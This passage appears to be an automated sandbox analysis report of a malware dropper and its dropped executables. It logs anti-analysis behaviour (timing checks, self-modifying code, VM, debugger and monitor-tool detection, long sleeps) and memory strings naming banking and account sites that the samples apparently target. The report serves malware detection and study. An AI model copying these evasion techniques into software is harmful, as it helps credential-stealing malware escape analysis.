Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50061 second address: 4C50065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50065 second address: 4C50081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50081 second address: 4C500D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F08C0CB4536h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F08C0CB4530h 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F08C0CB452Ch 0x00000020 adc ch, 00000028h 0x00000023 jmp 00007F08C0CB452Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500D9 second address: 4C500E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov eax, 41E125B1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D3DF3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D3E96 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D12C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B8FB8B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BF064A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19EB0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19EBF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 3490EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 19C3BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 35B54D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Special instruction interceptor: First address: 3D4378 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 731A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 8D4E36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 72F5E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 901F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19EB0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19EBF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3490EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 19C3BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 35B54D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Special instruction interceptor: First address: 961C3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: A3DA15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: BE662F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: A3B5BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: BEED09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3D4378 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Special instruction interceptor: First address: C739A9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E93DF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E93E96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: E912C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: 104FB8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Special instruction interceptor: First address: 10B064A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: C81A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: E24E36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: C7F5E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: E51F69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Special instruction interceptor: First address: EB1C3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 50F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 5360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Memory allocated: 7360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A00E3E rdtsc 3_2_04A00E3E
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3904 sidt fword ptr [esp-02h] 6_2_00BD3904
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2181
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 369
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 890
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 819
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1920
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Window / User API: threadDelayed 648
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe API coverage: 3.5 %
Source: C:\Users\user\Desktop\file.exe TID: 7116 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5972 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236 Thread sleep count: 2181 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236 Thread sleep time: -4364181s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3184 Thread sleep count: 369 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3184 Thread sleep time: -11070000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep count: 890 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep time: -1780890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 340 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4236 Thread sleep count: 819 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4236 Thread sleep time: -1638819s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5532 Thread sleep count: 1920 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5532 Thread sleep time: -3841920s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe TID: 7064 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 5708 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 280 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe TID: 5576 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9C2A2 FindFirstFileExW, 12_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD68EE FindFirstFileW,FindClose, 12_2_00FD68EE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00FD698F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD076
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD9642
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD979D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose, 12_2_00FD5C97
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: OLR88CERN7VQFRQ38J.exe, OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492334182.00000000008B6000.00000040.00000001.01000000.00000009.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551063753.0000000000BC8000.00000040.00000001.01000000.0000000B.sdmp, aae25c676b.exe, aae25c676b.exe, 00000009.00000002.2563291063.0000000001003000.00000040.00000001.01000000.0000000F.sdmp, 7d61336cf8.exe, 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp, aae25c676b.exe, 00000015.00000002.2721448202.0000000001003000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWFD
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562574422.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849118022.000002EE4E220000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: firefox.exe, 0000001A.00000002.2852111919.000002EE582C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001783000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: aae25c676b.exe, 00000015.00000002.2730364070.000000000176B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E229000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.B
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware^)
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492334182.00000000008B6000.00000040.00000001.01000000.00000009.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551063753.0000000000BC8000.00000040.00000001.01000000.0000000B.sdmp, aae25c676b.exe, 00000009.00000002.2563291063.0000000001003000.00000040.00000001.01000000.0000000F.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp, aae25c676b.exe, 00000015.00000002.2721448202.0000000001003000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A006CE Start: 04A0077A End: 04A006F8 3_2_04A006CE
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A00E3E rdtsc 3_2_04A00E3E
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD287D LdrInitializeThunk, 6_2_00BD287D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDEAA2 BlockInput, 12_2_00FDEAA2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F92622
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F84CE8 mov eax, dword ptr fs:[00000030h] 12_2_00F84CE8
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_00FC0B62
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F92622
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F8083F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F809D5 SetUnhandledExceptionFilter, 12_2_00F809D5
